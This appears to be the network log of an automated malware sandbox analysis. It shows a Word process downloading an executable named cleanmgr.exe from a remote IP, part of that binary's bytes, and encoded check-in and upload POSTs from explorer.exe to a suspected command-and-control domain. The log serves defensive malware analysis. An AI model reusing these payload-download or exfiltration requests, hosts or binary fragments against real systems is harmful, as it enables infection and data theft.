                                              Jun 13, 2023 11:01:15.735987902 CEST76INData Raw: 20 20 20 09 09 37 39 30 0a 30 20 09 20 09 09 30 30 30 30 09 20 20 09 09 30 0a 30 30 0a 30 20 09 20 09 09 30 09 20 20 09 09 30 0d 30 30 30 0a 30 0a 30 0a 30 0a 30 0a 30 30 30 0d 30 30 20 20 20 09 09 30 09 09 20 09 09 30 0d 30 09 20 09 20 20 30 20
                                              Data Ascii: 7900 0000 0000 0 0000000000000 0 00 0 0 0 00000000 000 0000 0 000 00000000 000000000 000 00 00000 000 00000000000 16000
                                              Jun 13, 2023 11:01:15.736046076 CEST77INData Raw: 30 30 30 09 09 20 20 20 30 0d 30 30 0d 30 0d 30 30 30 09 09 20 20 20 30 30 30 09 09 20 20 20 30 30 30 0a 30 30 30 0a 30 09 20 20 20 20 30 30 0a 30 30 30 30 30 30 30 0d 30 30 30 30 0d 30 30 30 30 0d 30 09 20 09 20 20 30 30 30 30 09 20 09 20 20 30
                                              Data Ascii: 000 0000000 000 0000000 000000000000000000 0000 00000 0000000000 0 000 00 0000 0000 00000 000000000 00000 0 0000f f ff fffff f fff
                                              Jun 13, 2023 11:01:15.736107111 CEST78INData Raw: 30 0a 30 30 30 0d 30 30 0d 39 0d 30 30 30 0d 30 0d 30 30 30 09 09 09 20 09 61 09 20 20 09 09 30 30 30 0a 30 0a 30 30 30 20 09 20 09 09 62 30 09 20 20 09 09 30 0a 30 20 09 20 09 09 30 30 0a 30 09 20 09 20 09 30 63 09 20 09 20 09 30 09 20 09 20 09
                                              Data Ascii: 00000090000000 a 0000000 b0 00 000 0c 0 0 000 00d 00 0000 0e 00000 00 f 00 000 010 0 0 00 00110000001 2 0000001 30
                                              Jun 13, 2023 11:01:15.841577053 CEST80INData Raw: 66 0a 66 0a 66 66 09 09 20 20 20 66 0a 66 66 66 66 66 20 20 20 20 20 66 20 20 20 20 20 66 66 66 66 0a 66 66 66 09 09 09 20 20 66 66 66 0d 66 09 09 09 20 20 66 0d 66 09 09 20 20 20 66 66 20 09 20 20 20 66 0d 66 66 0d 66 66 66 66 66 66 66 20 09 20
                                              Data Ascii: ffff ffffff f fffffff ffff ff ff ffffffffff ffff f f ffffff ffffffff ffff fffff ff f fffffffffffffff ffffffffffff f ffff
                                              Jun 13, 2023 11:01:16.929780006 CEST93OUTHEAD /we/wewewewewewewewew%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23ewewewewewewe.doc HTTP/1.1
                                              User-Agent: Microsoft Office Existence Discovery
                                              Content-Length: 0
                                              Connection: Keep-Alive
                                              Host: 15.223.2.12
                                              Jun 13, 2023 11:01:17.035751104 CEST93INHTTP/1.1 200 OK
                                              Date: Tue, 13 Jun 2023 09:01:16 GMT
                                              Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4
                                              Last-Modified: Tue, 13 Jun 2023 01:06:09 GMT
                                              ETag: "5ce4-5fdf870cbe527"
                                              Accept-Ranges: bytes
                                              Content-Length: 23780
                                              Keep-Alive: timeout=5, max=99
                                              Connection: Keep-Alive
                                              Content-Type: application/msword


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              11192.168.2.224919015.223.2.1280C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              TimestampkBytes transferredDirectionData
                                              Jun 13, 2023 11:01:19.015388012 CEST94OUTGET /102/cleanmgr.exe HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                              Host: 15.223.2.12
                                              Connection: Keep-Alive
                                              Jun 13, 2023 11:01:19.121722937 CEST95INHTTP/1.1 200 OK
                                              Date: Tue, 13 Jun 2023 09:01:19 GMT
                                              Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4
                                              Last-Modified: Tue, 13 Jun 2023 06:06:44 GMT
                                              ETag: "cf000-5fdfca3c004b5"
                                              Accept-Ranges: bytes
                                              Content-Length: 847872
                                              Keep-Alive: timeout=5, max=100
                                              Connection: Keep-Alive
                                              Content-Type: application/x-msdownload
                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 02 00 b9 19 94 cc 00 00 00 00 00 00 00 00 f0 00 2e 00 0b 02 30 00 00 e8 0c 00 00 06 00 00 00 00 00 00 00 00 00 00 00 20 00 00 00 00 40 00 00 00 00 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 0d 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 40 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 20 00 00 00 00 00 00 00 00 00 00 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0d 00 a8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 07 0d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 90 e7 0c 00 00 20 00 00 00 e8 0c 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 a8 05 00 00 00 20 0d 00 00 06 00 00 00 ea 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 00 00 00 02 00 05 00 c4 78 00 00 c8 43 00 00 01 00 00 00 01 00 00 06 8c bc 00 00 c8 48 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 07 00 a9 01 00 00 01 00 00 11 2b 05 28 45 00 3a 37 00 20 e1 84 a5 b0 20 01 00 00 00 63 20 70 c2 52 d8 61 28 2a 00 00 06 20 00 83 29 8f 20 58 6b 21 8f 61 28 2a 00 00 06 20 e0 ef 00 96 20 80 07 08 96 61 28 2a 00 00 06 28 10 00 00 0a 20 14 d4 45 05 20 72 3c 4d 05 61 28 2a 00 00 06 20 8a e1 9f a4 20 f0 0c 52 f2 61 20 0a 05 c5 56 61 28 2a 00 00 06 6f 10 00 00 0a 20 3c d5 ee 69 66 20 b5 c2 19 96 61 28 2a 00 00 06 20 45 80 14 16 20 39 68 1c 16 61 28 2a 00 00 06 6f 10 00 00 0a 20 1d 96 cb 6f 20 9f 7e c3 6f 61 28 2a 00 00 06 20 ea 37 77 28 20 62 df 7f 28 61 28 2a 00 00 06 6f 10 00 00 0a 20 21 e3 8a d9 20 05 00 00 00 62 20 ae 8c 54 31 61 28 2a 00 00 06 20 31 c1 9e e4 20 02 00 00 00 62 20 5e ec 73 92 61 28 2a 00 00 06 6f 10 00 00 0a 0a 06 28 11 00 00 0a 0b 20 3e c3 8b 10 20 9e 2b 83 10 61 28 2a 00 00 06 0c 20 b9 4a 56 0a 20 4e 29 ca 2b 58 20 b9 9c 28 36 61 28 2a 00 00 06 0d 20 f1 5f 64 8d 20 39 b7 6c 8d 61 28 2a 00 00 06 20 17 1c 54 e2 20 f9 d8 d4 6b 61 20 d4 2d 88 89 61 28 2a 00 00 06 20 92 ec 43 95 20 01 00 00 00 63 20 19 1f a9 ca 61 28 2a 00 00 06 28 10 00 00 0a 13 04 28 02 00 00 06 28 12 00 00 0a 13 05
                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEd.0 @ @`@@ D H.text `.rsrc @@HxCH0+(E:7 c pRa(* ) Xk!a(* a(*( E r<Ma(* Ra Va(*o <if a(* E 9ha(*o o ~oa(* 7w( b(a(*o ! b T1a(* 1 b ^sa(*o( > +a(* JV N)+X (6a(* _d 9la(* T ka -a(* C c a(*(((
                                              Jun 13, 2023 11:01:19.121800900 CEST97INData Raw: 1a 8d 15 00 00 01 25 16 11 04 a2 25 17 7e 13 00 00 0a a2 25 18 07 a2 25 19 17 8c 04 00 00 01 a2 13 06 11 05 08 6f 14 00 00 0a 09 20 00 01 00 00 14 14 11 06 74 01 00 00 1b 6f 15 00 00 0a 26 2a 00 00 00 13 30 05 00 ef 00 00 00 02 00 00 11 2b 05 28
                                              Data Ascii: %%~%%o to&*0+(oQ f )0a(* b Ga(* 'Y_ Q_a(*( x rpa(* \zf>f ma(*o & .a(* (a(*o a1Je &a(* b
                                              Jun 13, 2023 11:01:19.121871948 CEST98INData Raw: 6f 30 00 00 0a 80 20 00 00 04 17 28 31 00 00 0a dd 06 00 00 00 26 dd 00 00 00 00 2a 00 01 10 00 00 00 00 65 01 0b 70 01 06 15 00 00 01 06 2a 00 00 13 30 09 00 57 06 00 00 08 00 00 11 1f 10 8d 3a 00 00 01 0a 20 c0 01 00 00 02 8e 69 1e 5a 20 00 02
                                              Data Ascii: o0 (1&*ep*0W: iZ ]Y X ]: ij\nXjXmijjZ8Xi?i%G `R8$njYYZ?_d j_Y
                                              Jun 13, 2023 11:01:19.121921062 CEST99INData Raw: 09 11 04 11 05 1d 1f 0a 1f 32 06 28 1a 00 00 06 12 05 11 06 09 11 04 1f 0e 1f 0f 1f 33 06 28 1a 00 00 06 12 04 11 05 11 06 09 1b 1f 15 1f 34 06 28 1a 00 00 06 12 03 11 04 11 05 11 06 1f 0c 1c 1f 35 06 28 1a 00 00 06 12 06 09 11 04 11 05 19 1f 0a
                                              Data Ascii: 2(3(4(5(6(7(8(9(:(;(<(=(>(
                                              Jun 13, 2023 11:01:19.121982098 CEST101INData Raw: 16 00 fe 0c 13 00 fe 0c 13 00 1f 15 62 61 fe 0e 13 00 fe 0c 13 00 fe 0c 11 00 58 fe 0e 13 00 fe 0c 13 00 fe 0c 13 00 1f 11 64 61 fe 0e 13 00 fe 0c 13 00 fe 0c 15 00 58 fe 0e 13 00 fe 0c 13 00 fe 0c 13 00 1d 62 61 fe 0e 13 00 fe 0c 13 00 fe 0c 16
                                              Data Ascii: baXdaXbaXbXaYvlmXY@P>Ia8->bXX__dX?8Ia _X
                                              Jun 13, 2023 11:01:19.122057915 CEST102INData Raw: d4 ff ff ff 11 0d 6f 72 00 00 06 11 04 80 1f 00 00 04 dd 0d 00 00 00 09 39 06 00 00 00 08 28 49 00 00 0a dc 06 20 28 04 00 00 6f 4a 00 00 0a 0b 16 13 19 38 fa 01 00 00 00 07 11 19 9a 13 1a 11 1a 6f 26 00 00 0a 13 1b 7e 1f 00 00 04 11 1b 6f 4b 00
                                              Data Ascii: or9(I (oJ8o&~oK @_ ?_(oLoMoNt/oO9oP((o)ooQiX !oRoS9!oRo
                                              Jun 13, 2023 11:01:19.122133970 CEST103INData Raw: 25 29 00 00 fe 21 00 00 7f 27 00 00 97 1e 00 00 c8 0a 00 00 f2 24 00 00 66 01 00 00 2f 10 00 00 9a 26 00 00 94 11 00 00 c0 29 00 00 b8 1f 00 00 1a 10 00 00 64 0d 00 00 45 0a 00 00 de 19 00 00 b5 06 00 00 00 01 00 00 76 2c 00 00 55 06 00 00 e6 1d
                                              Data Ascii: %)!'$f/&)dEv,U83. U(;He&!L*?"s%'*R+
                                              Jun 13, 2023 11:01:19.122205973 CEST105INData Raw: 00 20 6c 00 00 00 20 7c 00 00 00 58 9c 20 0a 01 00 00 38 a6 f8 ff ff fe 0c 00 00 20 0a 00 00 00 20 98 00 00 00 20 09 00 00 00 58 9c 20 cc 00 00 00 28 5c 00 00 06 39 82 f8 ff ff 26 20 48 00 00 00 38 77 f8 ff ff fe 0c 00 00 20 08 00 00 00 fe 0c 07
                                              Data Ascii: l |X 8 X (\9& H8w 8_ fX I8F 8. (\9& 8 68 8
                                              Jun 13, 2023 11:01:19.122273922 CEST106INData Raw: 03 00 00 00 38 ae f3 ff ff fe 0c 02 00 20 18 00 00 00 20 fa 00 00 00 20 53 00 00 00 59 9c 20 b6 00 00 00 38 8f f3 ff ff 20 b5 00 00 00 20 3c 00 00 00 59 fe 0e 06 00 20 ed 00 00 00 38 76 f3 ff ff fe 0c 02 00 20 16 00 00 00 fe 0c 06 00 9c 20 32 01
                                              Data Ascii: 8 SY 8 <Y 8v 2([:Y& 08N ` -X 8/ 2Y 8 =Y +8 8 F8
                                              Jun 13, 2023 11:01:19.122343063 CEST108INData Raw: 01 00 00 38 a9 ee ff ff 20 50 00 00 00 20 78 00 00 00 58 fe 0e 06 00 20 3a 01 00 00 38 90 ee ff ff 20 5a 00 00 00 20 7a 00 00 00 58 fe 0e 06 00 20 08 00 00 00 28 5c 00 00 06 3a 72 ee ff ff 26 20 09 00 00 00 38 67 ee ff ff fe 0c 00 00 20 0d 00 00
                                              Data Ascii: 8 P xX :8 Z zX (\:r& 8g ([9J& 8? >Y ;(\:& H8 (\:& e8 ] zX 8 ?
                                              Jun 13, 2023 11:01:19.227762938 CEST109INData Raw: 00 38 a5 e9 ff ff fe 0c 00 00 20 08 00 00 00 fe 0c 07 00 9c 20 af 00 00 00 38 8d e9 ff ff fe 0c 02 00 20 15 00 00 00 fe 0c 06 00 9c 20 3a 00 00 00 38 75 e9 ff ff fe 0c 02 00 20 1d 00 00 00 20 e4 00 00 00 20 16 00 00 00 58 9c 20 28 00 00 00 38 56
                                              Data Ascii: 8 8 :8u X (8V eX 8= 8Y y8 r VX i8 X 38 C 9Y l8 F X 8


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              12192.168.2.224919313.248.169.4880C:\Windows\explorer.exe
                                              TimestampkBytes transferredDirectionData
                                              Jun 13, 2023 11:02:16.787611008 CEST1016OUTGET /hs95/?3fq=nMb/sedmpeBr7+ghqSOwC1xbmX5P5zzgM9CDx9I+q0VFP3WV4QSSvpToeK8jsn7ZNXtM7Q==&MJELdT=OHKPl0&sql=1 HTTP/1.1
                                              Host: www.folado.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              Jun 13, 2023 11:02:16.972018957 CEST1017INHTTP/1.1 403 Forbidden
                                              Date: Tue, 13 Jun 2023 09:02:16 GMT
                                              Content-Type: text/html
                                              Content-Length: 291
                                              Connection: close
                                              Server: openresty
                                              ETag: "6463c432-123"
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              13192.168.2.224919413.248.169.4880C:\Windows\explorer.exe
                                              TimestampkBytes transferredDirectionData
                                              Jun 13, 2023 11:02:19.075680017 CEST1020OUTPOST /hs95/ HTTP/1.1
                                              Host: www.folado.com
                                              Connection: close
                                              Content-Length: 2149
                                              Cache-Control: no-cache
                                              Origin: http://www.folado.com
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://www.folado.com/hs95/
                                              Accept-Language: en-US
                                              Accept-Encoding: gzip, deflate
                                              Data Raw: 33 66 71 3d 76 75 58 46 79 2d 77 55 74 65 55 51 72 2d 64 7a 7e 69 37 55 58 6c 55 30 75 55 55 44 34 43 33 72 58 49 43 54 32 70 41 54 6a 78 56 66 44 79 71 75 37 43 71 59 30 34 44 6e 46 73 63 44 70 6b 54 31 42 57 52 5a 35 6a 57 74 4a 69 59 59 50 74 64 70 73 4c 46 5f 79 73 73 58 67 59 34 30 6f 6e 31 4f 6f 6f 6f 33 51 42 47 44 77 54 7a 61 76 7a 74 70 47 44 67 47 6a 36 79 45 36 33 50 44 62 46 68 57 4d 6c 63 48 33 66 47 4a 59 61 66 5f 54 4e 28 42 74 59 65 53 70 30 76 53 47 54 42 61 54 79 4f 6c 79 54 31 57 6c 2d 4a 65 49 68 49 43 32 52 32 63 37 2d 46 48 65 75 62 69 59 42 74 6f 75 66 36 59 32 7a 65 69 56 6c 64 4c 63 42 4d 7a 41 70 68 46 68 49 77 2d 6d 75 7e 68 76 52 66 5f 30 50 57 42 31 53 50 58 70 32 4e 35 41 64 45 56 49 32 76 46 36 6a 56 79 52 79 35 4e 7a 4f 36 62 7a 55 4e 51 45 35 48 78 28 59 28 72 36 5f 68 42 7a 37 6d 57 69 6d 57 38 39 55 6a 50 43 52 55 69 76 71 70 5a 76 6a 71 70 6d 6a 52 56 6b 45 72 49 64 78 32 49 39 57 5a 7a 36 56 36 64 32 68 65 32 52 6f 79 72 4d 52 62 4b 58 6c 30 58 7e 77 6b 78 6d 76 61 44 59 2d 55 44 6b 32 42 34 37 37 67 42 58 34 65 66 5a 70 68 44 69 6a 57 6e 6a 6b 41 77 38 34 32 74 76 48 72 72 55 4a 72 34 66 48 39 5f 43 43 72 70 6d 6e 38 70 6b 64 64 31 36 59 49 36 78 6c 68 79 65 6a 6f 4d 68 66 47 54 72 69 4a 77 35 55 38 6d 39 65 74 61 52 68 67 39 6c 6c 6a 57 35 4e 32 73 6e 47 33 6d 69 39 6f 6f 57 63 52 6d 64 46 4e 71 30 75 75 72 70 55 72 62 5a 2d 39 6a 43 55 68 6b 36 36 54 4a 78 2d 71 33 68 78 43 57 58 75 42 64 69 7a 65 58 7e 63 6b 61 57 63 31 71 68 66 4c 41 41 64 48 38 44 35 39 48 37 6e 38 63 50 36 4d 30 75 4b 45 51 31 44 43 52 59 76 38 57 4d 35 43 6c 64 34 58 39 69 77 41 71 56 57 76 65 63 66 37 56 67 6a 41 48 55 32 43 35 69 30 7a 4a 59 36 31 57 49 53 4e 42 59 4d 30 30 77 4d 37 36 54 31 4e 30 7e 66 76 55 34 6e 36 73 4e 75 28 67 44 70 4a 79 6d 36 34 41 75 4f 70 58 45 7a 38 58 63 46 50 4e 47 6a 73 6a 6b 67 7a 54 62 32 48 77 71 68 58 63 59 62 77 54 4c 33 31 43 28 47 59 34 6b 32 33 68 37 68 69 62 54 79 7a 46 6d 54 79 4e 56 59 6f 37 71 64 64 48 4c 6c 34 73 34 41 68 49 65 72 4a 41 73 44 4c 49 74 38 49 4c 36 5a 53 61 7a 78 48 59 51 5a 70 46 7e 50 71 44 69 34 78 61 32 54 41 57 67 49 5a 31 72 72 74 6d 6e 2d 68 50 52 73 57 67 57 39 6b 45 62 65 6e 51 30 2d 6f 59 47 6b 4b 6f 78 65 4d 64 43 58 39 32 4d 74 77 35 61 33 46 36 4a 47 50 65 65 58 28 4b 35 36 67 66 74 75 75 52 76 47 37 35 56 67 53 53 46 35 6b 38 62 49 4d 39 41 4b 4e 63 55 52 58 56 48 58 37 31 7e 65 55 37 75 54 36 6d 77 6a 78 73 43 45 38 56 72 6b 67 33 52 4f 7a 45 73 6c 68 62 38 77 35 39 37 6b 59 50 4f 4a 68 67 65 77 57 4e 39 76 6e 62 6d 77 32 72 32 69 56 56 71 4c 71 33 76 48 32 47 67 36 79 30 39 38 31 47 52 38 47 44 4f 4b 76 4b 45 67 6f 36 71 41 35 6e 55 41 48 45 77 30 44 2d 70 48 50 4d 7a 38 5a 70 4a 30 7e 55 41 66 33 73 6a 42 34 7a 39 38 79 59 36 52 34 77 63 41 33 61 38 52 53 52 55 4f 59 4d 53 51 72 38 28 68 45 6f 30 70 77 58 4f 39 44 74 46 32 30 76 54 34 50 4a 45 45 76 76 30 35 66 32 38 2d 56 4f 7e 4c 41 35 59 36 62 6c 5a 47 41 30 73 71 77 71 4d 79 7e 48 77 59 44 48 70 68 4c 43 36 79 32 32 56 4c 4b 78 32 57 61 36 63 59 51 78 54 70 61 4c 43 68 63 5a 71 63 56 68 39 53 28 63 53 77 4c 36 48 79 45 71 61 67 4f 4c 76 58 32 77 56 36 59 4e 4c 75 7a 57 6b 36 31 57 69 54 46 65 6a 54 64 71 32 51 63 61 67 73 64 63 66 6f 51 58 73 65 32 77 42 6d 44 66 59 75 6b 6c 6a 4b 4a 79 75 78 52 75 5a 30 5a 35 38 4d 46 52 39 30 32 4e 44 73 30 52 41 5a 28 38 73 76 61 62 34 34 4e 6a 46 42 72 32 37 55 7e 54 7a 35 4c 44 55 36 59 4c 4c 76 51 61 4d 75 63 73 44 62 43 63 4c 70 46 54 56 68 6f 68 33 68 75 4c 52 71 48 39 41 71 69 6a 49 66 54 4d 51 4e 57 63 46 47 56 43 69 35 48 57 49 72 61 56 54 34 4a 49 6e 61 36 6b 31 69 52 70 52 7a 68 75 39 5a 44 45 54 75 46 38 79 4b 7a 47 66 36 45 73 51 6c 65 5a 31 41 49 49 72 75 65 69 36 75 76 6e 72 66 67 32 69 69 56 4b 50 4f 41 69 58 64 34 6f 4c 64 7e 52 4e 6f 73 33 42 4b 64 53 50 4b 6b 6b 52 71 70 4a 79 45 45 67 43 66 4f 30 4b 65 35 2d 65 67 34 50 70 2d 6a 6b 69 52 33 4f 76 34 35 32 62 48 4a 6f 37 72 73 55 33 64 37 6e 77 75 43 36 62 51 52 45 36 4b 37 44 44 72 47 6a 66 6d 5a 54 42 54 37 6b 68 48 47 2d 54 43 59 58 36 38 47 30 4e 79 38 65 79 42 35
                                              Data Ascii: 3fq=vuXFy-wUteUQr-dz~i7UXlU0uUUD4C3rXICT2pATjxVfDyqu7CqY04DnFscDpkT1BWRZ5jWtJiYYPtdpsLF_yssXgY40on1Oooo3QBGDwTzavztpGDgGj6yE63PDbFhWMlcH3fGJYaf_TN(BtYeSp0vSGTBaTyOlyT1Wl-JeIhIC2R2c7-FHeubiYBtouf6Y2zeiVldLcBMzAphFhIw-mu~hvRf_0PWB1SPXp2N5AdEVI2vF6jVyRy5NzO6bzUNQE5Hx(Y(r6_hBz7mWimW89UjPCRUivqpZvjqpmjRVkErIdx2I9WZz6V6d2he2RoyrMRbKXl0X~wkxmvaDY-UDk2B477gBX4efZphDijWnjkAw842tvHrrUJr4fH9_CCrpmn8pkdd16YI6xlhyejoMhfGTriJw5U8m9etaRhg9lljW5N2snG3mi9ooWcRmdFNq0uurpUrbZ-9jCUhk66TJx-q3hxCWXuBdizeX~ckaWc1qhfLAAdH8D59H7n8cP6M0uKEQ1DCRYv8WM5Cld4X9iwAqVWvecf7VgjAHU2C5i0zJY61WISNBYM00wM76T1N0~fvU4n6sNu(gDpJym64AuOpXEz8XcFPNGjsjkgzTb2HwqhXcYbwTL31C(GY4k23h7hibTyzFmTyNVYo7qddHLl4s4AhIerJAsDLIt8IL6ZSazxHYQZpF~PqDi4xa2TAWgIZ1rrtmn-hPRsWgW9kEbenQ0-oYGkKoxeMdCX92Mtw5a3F6JGPeeX(K56gftuuRvG75VgSSF5k8bIM9AKNcURXVHX71~eU7uT6mwjxsCE8Vrkg3ROzEslhb8w597kYPOJhgewWN9vnbmw2r2iVVqLq3vH2Gg6y0981GR8GDOKvKEgo6qA5nUAHEw0D-pHPMz8ZpJ0~UAf3sjB4z98yY6R4wcA3a8RSRUOYMSQr8(hEo0pwXO9DtF20vT4PJEEvv05f28-VO~LA5Y6blZGA0sqwqMy~HwYDHphLC6y22VLKx2Wa6cYQxTpaLChcZqcVh9S(cSwL6HyEqagOLvX2wV6YNLuzWk61WiTFejTdq2QcagsdcfoQXse2wBmDfYukljKJyuxRuZ0Z58MFR902NDs0RAZ(8svab44NjFBr27U~Tz5LDU6YLLvQaMucsDbCcLpFTVhoh3huLRqH9AqijIfTMQNWcFGVCi5HWIraVT4JIna6k1iRpRzhu9ZDETuF8yKzGf6EsQleZ1AIIruei6uvnrfg2iiVKPOAiXd4oLd~RNos3BKdSPKkkRqpJyEEgCfO0Ke5-eg4Pp-jkiR3Ov452bHJo7rsU3d7nwuC6bQRE6K7DDrGjfmZTBT7khHG-TCYX68G0Ny8eyB5ni2FjWcH1yXTqKgsKqrJ8A91LKBOWQo6VxmNFda1K5yB-NtIkB7SQvw3_AvSqIbfh19LBqky9vnWAguw6d1sg(aEGFkuGF9SSow2JAY3Rzttr0G4iq3r-eCkjbDAuxZULVJOCynSOfPhFt3PKCHclgsAaFySg99~8yeyQyCqby8rmRUl8casoUEGrDWlgOxOmAQcOh-Fhl-8F6Lyz2q9PR0EjBrL8KEJz6LLj(Owl63NJkC3c~MeLK3(28aLUV8138_Kofck4EBxsNiL1ZzCURevUzuS0ybRp~KZiqcVPdszJUxz1pU6KTOKAjv~F4mAGTLhxrJ(iBwoSbg9_SjA1qPdTW7RTryUMSF0O2yQ3uxWZTXUjqIKtkQtCtOdcQih2lKVlE9VsSChvlMex1aMFwNq7OXgrTnF1kh7Laxako3Wm8S5ZFYtSMjQxM-qt9_Cp3b1GDOSMYmT2Y0(OiDqXDXjppiUslU1_4oAc05uYzWTYlp8qWwvmpjJ1Cjsw9oTUHBKETq8ufAM2bXGqdOBr(FCbszo3NV~liYynntKbP0C4HPJOD5Ymjtoul_YY4NDKaTGwChPx81u8YVRx~r4tlFUTvQcwNfBhYqHrt886S7IsiBjjd8p9ZM1brdM62-MuIvUviaPAwEHOkGVaBOJnvaFNIxLAvdhWtQlla_SuKB35Mad6SijGN7CQ526q4miXbT5DckfVOJQVlAkZw5AbGAi-ULEk7z1syWHme4R2k-Xce2TfrROLrSPulHiEOxm2v73ckC9XhD(W


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              14192.168.2.224919513.248.169.4880C:\Windows\explorer.exe
                                              TimestampkBytes transferredDirectionData
                                              Jun 13, 2023 11:02:19.098532915 CEST1023OUTPOST /hs95/ HTTP/1.1
                                              Host: www.folado.com
                                              Connection: close
                                              Content-Length: 147109
                                              Cache-Control: no-cache
                                              Origin: http://www.folado.com
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://www.folado.com/hs95/
                                              Accept-Language: en-US
                                              Accept-Encoding: gzip, deflate
                                              Data Raw: 33 66 71 3d 76 75 58 46 79 37 4e 74 68 4f 5a 63 36 74 35 35 34 58 4c 63 53 46 45 68 6c 33 68 61 37 53 50 55 61 37 37 36 32 70 51 58 76 56 52 42 48 53 36 75 79 68 43 66 39 34 44 6d 44 73 63 41 74 6b 65 43 49 68 74 6e 35 69 69 48 4a 69 51 62 48 6f 31 57 71 6f 74 6f 76 73 6f 6e 75 4d 6f 74 73 6c 39 4e 6f 4b 56 75 56 44 32 44 36 48 7a 59 71 67 56 79 56 47 4d 53 68 61 75 47 31 56 4f 4e 56 56 42 33 50 48 78 41 39 37 4b 78 50 4f 54 30 63 4a 71 73 73 36 75 6b 6d 67 28 64 4d 77 39 63 54 56 32 62 7a 51 74 34 35 4f 52 4e 57 7a 55 4d 77 42 57 75 37 5f 52 36 45 66 72 78 51 6d 77 41 75 75 4c 36 79 79 61 69 4f 78 51 54 55 69 45 78 4d 4c 70 6e 73 5f 73 54 6a 64 32 4d 6c 7a 47 31 36 2d 32 4b 30 58 54 48 30 48 49 4e 43 59 34 4a 52 55 47 79 38 43 68 35 54 68 67 43 36 70 65 30 7a 41 46 4a 46 38 58 70 79 5a 6a 59 31 74 74 4e 34 4c 47 75 68 42 47 6b 7e 33 37 31 54 69 6b 67 67 72 4a 59 75 6d 28 6f 73 6a 74 57 6d 46 66 55 53 58 37 31 38 68 35 37 34 56 50 68 31 68 65 70 52 75 71 54 4d 52 66 4f 58 67 67 35 78 67 34 78 6b 4b 65 63 61 36 49 36 6c 32 42 74 75 62 77 53 51 4c 47 59 5a 